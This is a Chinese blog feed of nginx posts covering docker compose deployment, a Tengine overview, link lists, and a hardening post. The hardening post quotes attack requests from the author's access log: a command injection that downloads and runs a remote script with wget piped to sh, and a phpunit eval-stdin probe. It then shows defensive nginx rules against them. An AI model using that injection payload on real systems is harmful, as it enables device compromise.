BlogJava-paulwong-随笔分类-NGINX

zh-cnThu, 20 Jun 2024 01:42:24 GMTThu, 20 Jun 2024 01:42:24 GMT60部署docker版的nginxhttp://www.blogjava.net/paulwong/archive/2024/06/19/451449.htmlpaulwongpaulwongWed, 19 Jun 2024 14:03:00 GMThttp://www.blogjava.net/paulwong/archive/2024/06/19/451449.htmlhttp://www.blogjava.net/paulwong/comments/451449.htmlhttp://www.blogjava.net/paulwong/archive/2024/06/19/451449.html#Feedback0http://www.blogjava.net/paulwong/comments/commentRss/451449.htmlhttp://www.blogjava.net/paulwong/services/trackbacks/451449.html使用docker compose搞配置方便，配置放在配置文件中，比放在启动命令直观。

docker-compose.yaml

version: '3.8'
services:

  nginx-web: #这里注意名称随便起，但要保证在docker环境中维一，否则docker compose down时，会被全局down掉
    volumes:
      - /opt/tool/nginx/data/html:/usr/share/nginx/html:ro #配置html文件在宿主机上
      - /opt/tool/nginx/data/conf/nginx.conf:/etc/nginx/nginx.conf:ro #配置配置文件在宿主机上
      - /opt/tool/nginx/data/conf/conf.d/default-web.conf:/etc/nginx/conf.d/default.conf:ro #配置配置文件在宿主机上
      - /opt/tool/nginx/data/conf/.htpasswd:/etc/nginx/.htpasswd:ro #配置登录NGINX时要用到的用户名和密码文件
      - /etc/localtime:/etc/localtime:ro #配置NGINX上的时钟与宿主机相同
      - /opt/tool/nginx/data/log/access.log:/var/log/nginx/access.log #配置ACCESS文件在宿主机上
      - /opt/tool/nginx/data/log/error.log:/var/log/nginx/error.log #配置ERROR文件在宿主机上
    container_name: nginx-web #容器名称，全局维一
    ports:
      - "80:80"
    image: nginx:latest
    #image: quay.io/ricardbejarano/nginx
    restart: unless-stopped

启动命令 start-nginx.sh

cd $(cd `dirname $0`; pwd)
docker compose -f docker-compose-web.yaml down #启动前先把相应的镜像干掉
docker compose -f docker-compose-web.yaml up -d #后台启动

docker exec -it nginx /bin/bash

paulwong 2024-06-19 22:03 发表评论

]]>NGINX的安全性配置http://www.blogjava.net/paulwong/archive/2024/06/19/451448.htmlpaulwongpaulwongWed, 19 Jun 2024 13:38:00 GMThttp://www.blogjava.net/paulwong/archive/2024/06/19/451448.htmlhttp://www.blogjava.net/paulwong/comments/451448.htmlhttp://www.blogjava.net/paulwong/archive/2024/06/19/451448.html#Feedback0http://www.blogjava.net/paulwong/comments/commentRss/451448.htmlhttp://www.blogjava.net/paulwong/services/trackbacks/451448.html最近将一台HTTP服务器暴露于仅见，随即引来大量黑客的光顾，其实也就是发各种HTTP请求，以获取一个输入，输出界面，在输入界面输入SHELL命令，在输出界面观看结果，也就是说不用去到电脑前，用登录用户名和密码这种方法来登录，再跑各种命令。

日志显示有下面这些操作：

185.191.127.212 - - [19/Jun/2024:21:10:22 +0800] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.28.141%2Ft+-O-+|+sh%60) HTTP/1.1" 444 0 "-" "Go-http-client/1.1" "-"

60.221.228.127 - - [15/Jun/2024:21:10:02 +0800] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 444 0 "-" "Custom-AsyncHttpClient" "-"

于是在NGINX上加上相应规则，遇到类似的直接返回444

其中/etc/nginx/conf/nginx.conf

user  nginx;
worker_processes  auto;

error_log  /var/log/nginx/error.log notice;
pid        /var/run/nginx.pid;
events {
    worker_connections  1024;
}
http {
    #include       /etc/nginx/mime.types;
    #default_type  application/octet-stream;

    #paul-1
    server_tokens off;
    map $remote_addr $loggable {
         ~^192\.168\.1 0;        # 如果IP以192开头，则不记录日志
         ~^219\.888\.888\.888 0; # 如果IP是219.888.888.8，则不记录日志
         default 1;       # 其他情况默认记录日志
    }

    log_format  main  '$remote_addr - $remote_user [$time_local] "$request" '
                      '$status $body_bytes_sent "$http_referer" '
                      '"$http_user_agent" "$http_x_forwarded_for"';

    #paul-2
    access_log  /var/log/nginx/access.log  main if=$loggable;＃引用上面的规则

    sendfile        on;
    #tcp_nopush     on;
    keepalive_timeout  65;
    #gzip  on;
    include /etc/nginx/conf.d/*.conf;
    map $http_upgrade $connection_upgrade {
       default upgrade;
       '' close;
    }
    upstream uvicorn {
       server unix:/tmp/uvicorn.sock;
    }
}

/etc/nginx/conf/conf.d/default.conf，这里是将请求转发后到后端的配置

server {
    listen 81;
    listen  [::]:80;

    #paul-3
    server_name paulwong88.com;

    #paul-4
    # 验证 Host 头部是否为您的域名
    if ($host != 'paulwong88.com') {
    return 444;  # 对非授权域名的请求直接关闭连接
    }

    client_max_body_size 4G;
    #server_name localhost;

    location / {
      #include       /etc/nginx/mime.types;
      #default_type  application/octet-stream;
      add_header 'Cache-control' 'no-cache';
      proxy_set_header Host $http_host;
      proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
      proxy_set_header X-Forwarded-Proto $scheme;
      proxy_set_header Upgrade $http_upgrade;
      proxy_set_header Connection $connection_upgrade;
      proxy_redirect off;
      proxy_buffering off;
      proxy_pass http://open-webui:8080;
    }

    #paul-5
    location ~ ^/cgi-bin/ {
      deny all;
      return 444;# 限制对 CGI 目录的访问
    }
}

/etc/nginx/conf/conf.d/default-web.conf，这里是放置静态页面的配置

server {
    listen 80;
    listen  [::]:80;
    expires -1;

    #paul-3
    server_name paulwong88.com;

    #paul-4
    # 验证 Host 头部是否为您的域名
    if ($host != 'paulwong88.com') {
    return 444;  # 对非授权域名的请求直接关闭连接
    }

    client_max_body_size 4G;
    #server_name localhost;

    location / {
          #如果不加，nginx会乱发http头，导致浏览器无法解析css,js这种文件
          include       /etc/nginx/mime.types; #默认在http中是有这个配置的，但又重复了一遍，告诉nginx如果碰到各种后缀，如.css，应如何添加http头
       default_type  application/octet-stream; #默认在http中是有这个配置的，但又重复了一遍，加默认要加的http头
      root   /usr/share/nginx/html;
      index  index.html index.htm;
    }

    #paul-5
    location ~ ^/cgi-bin/ {
      deny all;
      return 444;# 限制对 CGI 目录的访问
    }

    #location /static {
      # path for static files
      #root /path/to/app/static;
    #}

    #网上建议这样加，但发现没效果
    #location ~ \.css {
       #root   /usr/share/nginx/html;
       #add_header  Content-Type    text/css;
       #default_type text/css;
    #}

    #location ~ \.js {
       #root   /usr/share/nginx/html;
       #add_header  Content-Type    application/x-javascript;
    #}
}

这样基本各路黑客输入一条命令后，基本就打退堂鼓了。

paulwong 2024-06-19 21:38 发表评论

]]>Nginx代理转发SFTPhttp://www.blogjava.net/paulwong/archive/2021/10/15/436012.htmlpaulwongpaulwongFri, 15 Oct 2021 02:04:00 GMThttp://www.blogjava.net/paulwong/archive/2021/10/15/436012.htmlhttp://www.blogjava.net/paulwong/comments/436012.htmlhttp://www.blogjava.net/paulwong/archive/2021/10/15/436012.html#Feedback0http://www.blogjava.net/paulwong/comments/commentRss/436012.htmlhttp://www.blogjava.net/paulwong/services/trackbacks/436012.htmlhttps://blog.csdn.net/qq_27127385/article/details/103666143

paulwong 2021-10-15 10:04 发表评论

]]>nginx 之 proxy_pass详解http://www.blogjava.net/paulwong/archive/2021/08/30/435959.htmlpaulwongpaulwongMon, 30 Aug 2021 07:16:00 GMThttp://www.blogjava.net/paulwong/archive/2021/08/30/435959.htmlhttp://www.blogjava.net/paulwong/comments/435959.htmlhttp://www.blogjava.net/paulwong/archive/2021/08/30/435959.html#Feedback0http://www.blogjava.net/paulwong/comments/commentRss/435959.htmlhttp://www.blogjava.net/paulwong/services/trackbacks/435959.htmlhttps://www.jianshu.com/p/b010c9302cd0

paulwong 2021-08-30 15:16 发表评论

]]>Tenginehttp://www.blogjava.net/paulwong/archive/2015/11/06/428066.htmlpaulwongpaulwongFri, 06 Nov 2015 04:56:00 GMThttp://www.blogjava.net/paulwong/archive/2015/11/06/428066.htmlhttp://www.blogjava.net/paulwong/comments/428066.htmlhttp://www.blogjava.net/paulwong/archive/2015/11/06/428066.html#Feedback0http://www.blogjava.net/paulwong/comments/commentRss/428066.htmlhttp://www.blogjava.net/paulwong/services/trackbacks/428066.html

简介

Tengine是由淘宝网发起的Web服务器项目。它在Nginx的基础上，针对大访问量网站
的需求，添加了很多高级功能和特性。Tengine的性能和稳定性已经在大型的网站如
淘宝网，天猫商城等得到了很好的检验。它的最终目标是打造一个高效、稳定、安全、
易用的Web平台。

从2011年12月开始，Tengine成为一个开源项目，Tengine团队在积极地开发和维护
着它。Tengine团队的核心成员来自于淘宝、搜狗等互联网企业。Tengine是社区合作
的成果，我们欢迎大家参与其中，贡献自己的力量。

特性

继承Nginx-1.6.2的所有特性，兼容Nginx的配置；
动态模块加载（DSO）支持。加入一个模块不再需要重新编译整个Tengine；
支持SO_REUSEPORT选项，建连性能提升为官方nginx的三倍；
支持SPDY v3协议，自动检测同一端口的SPDY请求和HTTP请求；
流式上传到HTTP后端服务器或FastCGI服务器，大量减少机器的I/O压力；
更加强大的负载均衡能力，包括一致性hash模块、会话保持模块，还可以对后端的服务器进行主动健康检查，根据服务器状态自动上线下线，以及动态解析upstream中出现的域名；
输入过滤器机制支持。通过使用这种机制Web应用防火墙的编写更为方便；
支持设置proxy、memcached、fastcgi、scgi、uwsgi在后端失败时的重试次数
动态脚本语言Lua支持。扩展功能非常高效简单；
支持管道（pipe）和syslog（本地和远端）形式的日志以及日志抽样；
支持按指定关键字(域名，url等)收集Tengine运行状态；
组合多个CSS、JavaScript文件的访问请求变成一个请求；
自动去除空白字符和注释从而减小页面的体积
自动根据CPU数目设置进程个数和绑定CPU亲缘性；
监控系统的负载和资源占用从而对系统进行保护；
显示对运维人员更友好的出错信息，便于定位出错机器；
更强大的防攻击（访问速度限制）模块；
更方便的命令行参数，如列出编译的模块列表、支持的指令等；
可以根据访问文件类型设置过期时间；
……

动态

[2015-08-12] Tengine-2.1.1 稳定版正式发布 (变更列表)
[2014-12-19] Tengine-2.1.0 开发版正式发布 (变更列表)
[2014-05-30] Tengine-2.0.3 开发版正式发布（变更列表）
[2014-03-28] Tengine-2.0.2 开发版正式发布（变更列表）
[2014-03-06] Tengine-2.0.1 开发版正式发布（变更列表）
[2014-01-08] Tengine-2.0.0 开发版正式发布（变更列表）
[2013-11-22] Tengine-1.5.2 稳定版正式发布（变更列表）
[2013-08-29] Tengine-1.5.1 稳定版正式发布（变更列表）
[2013-08-04] 我们受邀在台湾开源人年会上做了《Nginx深度开发与定制》的
技术分享
[2013-07-31] Tengine-1.5.0 稳定版正式发布（变更列表）
[2013-05-14] Tengine-1.4.6 开发版正式发布（变更列表）
[2013-05-01] Tengine-1.4.5 开发版正式发布（变更列表）
[2013-03-21] Tengine-1.4.4 开发版正式发布（变更列表）
[2013-01-21] Tengine-1.4.3 开发版正式发布（变更列表）
[2012-11-22] Tengine-1.4.2 开发版正式发布（变更列表）
[2012-10-10] Tengine-1.4.1 开发版正式发布（变更列表）
[2012-09-05] Tengine-1.4.0 开发版正式发布（变更列表）
[2012-07-10] Nginx文档中文翻译项目开始
[2012-06-28] 我们翻译的Nginx中文文档正式被Nginx官方接受
[2012-06-09] 我们在华东运维技术大会做了《淘宝网Nginx应用、定制与开发实战》
的技术分享
[2012-05-25] Tengine-1.3.0 稳定版正式发布（变更列表）
[2012-05-09] Tengine-1.2.5 稳定版正式发布（变更列表）
[2012-03-30] Tengine-1.2.4 稳定版正式发布（变更列表）
[2012-03-08] Tengine开发团队开始编写开放书籍《Nginx开发从入门到精通》
[2012-02-27] Tengine-1.2.3 稳定版正式发布（变更列表）
[2012-01-11] Tengine-1.2.2 稳定版正式发布（变更列表）
[2011-12-07] Tengine开发团队在Velocity大会上介绍了《淘宝网Nginx定制实战》
的一些经验
[2011-12-06] Tengine-1.2.1 版本正式发布（变更列表）
[2011-12-02] Tengine宣布开源

邮件列表

中文：http://code.taobao.org/mailman/listinfo/tengine-cn
英文：http://code.taobao.org/mailman/listinfo/tengine

paulwong 2015-11-06 12:56 发表评论

]]>NGINX资源http://www.blogjava.net/paulwong/archive/2013/11/24/406758.htmlpaulwongpaulwongSun, 24 Nov 2013 13:11:00 GMThttp://www.blogjava.net/paulwong/archive/2013/11/24/406758.htmlhttp://www.blogjava.net/paulwong/comments/406758.htmlhttp://www.blogjava.net/paulwong/archive/2013/11/24/406758.html#Feedback0http://www.blogjava.net/paulwong/comments/commentRss/406758.htmlhttp://www.blogjava.net/paulwong/services/trackbacks/406758.htmlhttp://www.oschina.net/question/1014681_107718

安装NGINX：
https://www.server-world.info/en/note?os=CentOS_Stream_8&p=nginx&f=1

自己生成证书：
https://www.server-world.info/en/note?os=CentOS_Stream_8&p=ssl&f=1

NGINX配置HTTPS：
https://www.server-world.info/en/note?os=CentOS_Stream_8&p=nginx&f=3

NGINX配置负载均衡
https://www.server-world.info/en/note?os=CentOS_Stream_8&p=nginx&f=9

NGINX配置反射代理
https://www.server-world.info/en/note?os=CentOS_Stream_8&p=nginx&f=8

彻底搞懂 Nginx 五大应用场景！出去吹牛逼再也不担心了
https://segmentfault.com/a/1190000040420111

Nginx系列教程(3)nginx缓存服务器上的静态文件
https://segmentfault.com/a/1190000022548261

Nginx常用反向代理配置规则
https://segmentfault.com/a/1190000022501310

Nginx系列教程(10)基于Nginx解决前端访问后端服务跨域问题(Session和cookie无效)
https://segmentfault.com/a/1190000022505420

生产环境之Nginx高可用方案(keepalived+双机热备)
https://segmentfault.com/a/1190000022511710

【nginx】配置Nginx实现负载均衡
https://segmentfault.com/a/1190000017096671

面试官：Nginx 如何实现高并发？常见的优化手段有哪些？
https://segmentfault.com/a/1190000040559345

paulwong 2013-11-24 21:11 发表评论

]]>